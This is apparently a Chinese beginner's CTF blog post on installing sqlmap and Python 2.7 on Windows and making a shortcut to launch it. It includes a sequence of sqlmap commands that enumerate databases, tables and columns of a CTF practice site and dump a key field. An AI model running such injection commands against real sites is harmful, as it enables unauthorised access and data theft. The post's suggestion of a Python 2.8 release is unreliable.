180208—【CTF】Windows下 sqlmap 安装、配置、及快捷方式启动

legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
合法免责声明：事先未经双方同意，使用sqlmap攻击目标是非法的。遵守所在地适用法律是最终用户的责任。开发人员不承担任何责任，也不对由此程序造成的任何滥用或损害负责。
—sqlmap

按：CTF入坑第一天。
sqlmap是一款使用广泛的SQL注入工具。它本身是一个python脚本（.py文件）基本上配好python的环境变量之后它的配置就不成问题。

材料：

1、SqlMap下载地址：https://github.com/sqlmapproject/sqlmap/tarball/master 可下载到最新版本的SqlMap；
2、Python下载地址：https://www.python.org/ 可下载到相应的Python.建议下载2.7或者2.8版本的python，配合1中的sqlmap

python安装与环境变量的配置：

首先需要安装python。
顺路点下去就好，路径的话放在哪是自己随意选的，但是，你得自己找得到。。
但要注意此步：

最后一个需要进行选择，来确定Python的路径可以在cmd窗口之中被找到
选择 Add python.exe to Path>>Entire feature will be installed on local hard drive 。

静待安装完成之后，需要到cmd窗口中测试：
在命令行输入：python，出现该窗口为成功：

如果出现说：

‘python’不是内部或外部命令，也不是可运行的程序或批处理文件。

说明环境变量配置无效。
可以直接在cmd中输入：
path=%path%;D:\Python27 接着按”Enter”回车键。 D:\Python27 是Python的安装目录。
其他方法还可参照：python安装与环境变量的配置

sqlmap的安装和配置：

上面给的下载地址下载之后，解压。
下面是建议：
把解压之后得到的一个名为“sqlmapproject-sqlmap-1.2.2-5-g5b99180”的文件夹下的所有文件打包复制，在Python的安装目录中新建一个名为sqlmap的文件夹，粘贴。
为了好找。。仅此而已。。
这之后可以看到一个名为sqlmap的.py文件了。
双击打开之后，只会发现：

看见这个东西表示sqlmap已经安装完成了，但是这个界面毫无用处，一回车之后会关掉。。

这是因为启动sqlmap时并没有给它指令。

sqlmap的启动：

要使用sqlmap需要回到刚才的cmd窗口之中：
键入：

python E:Python27\sqlmap\sqlmap.py

最先的python表示该文件需要Python来解释，后面跟着的是它的路径。注意别错，另外.py不要丢。
但是这样调用之后还是只能按一下回车说拜拜，因为没有命令，只是调用，跟刚才的双击是一个666的效果。
在原命令下加 -h可以打开help界面。
python E:Python27\sqlmap\sqlmap.py -h

实操之后就会发现，这个命令需要一直写着。
例如，如果你想进入一个数据库的某张表中，一步步进入的过程即使命令越来越长的过程。。
例子来自实验吧一题：

python E:Python27\sqlmap\sqlmap.py -u"http://ctf5.shiyanbar.com/8/index.php?id=1"
python E:Python27\sqlmap\sqlmap.py -u"http://ctf5.shiyanbar.com/8/index.php?id=1"--dbs
python E:Python27\sqlmap\sqlmap.py -u"http://ctf5.shiyanbar.com/8/index.php?id=1"  -D my_db --tables
python E:Python27\sqlmap\sqlmap.py -u"http://ctf5.shiyanbar.com/8/index.php?id=1"  -D my_db -T thiskey --columns
8>python E:Python27\sqlmap\sqlmap.py -u"http://ctf5.shiyanbar.com/8/index.php?id=1"  -D my_db -T thiskey -C k0y --dump

设置一个启动的快捷方式：

为了避免每次都要输入路径的尴尬，我们可以创建一个打开sqlmap的更快捷的方法：
桌面右键新建快捷方式：
先在位置栏输 cmd ，名字随心发挥吧。。

之后右键，属性。修改起始位置，填入sqlmap.py的路径。注意不要写sqlmap.py

确定保存，打开之后即为：

这时候直接输sqlmap.py即可启动了。

参考：
https://jingyan.baidu.com/article/60ccbceb64cc2064cbb19748.html
https://www.cnblogs.com/lauren1003/p/6131172.html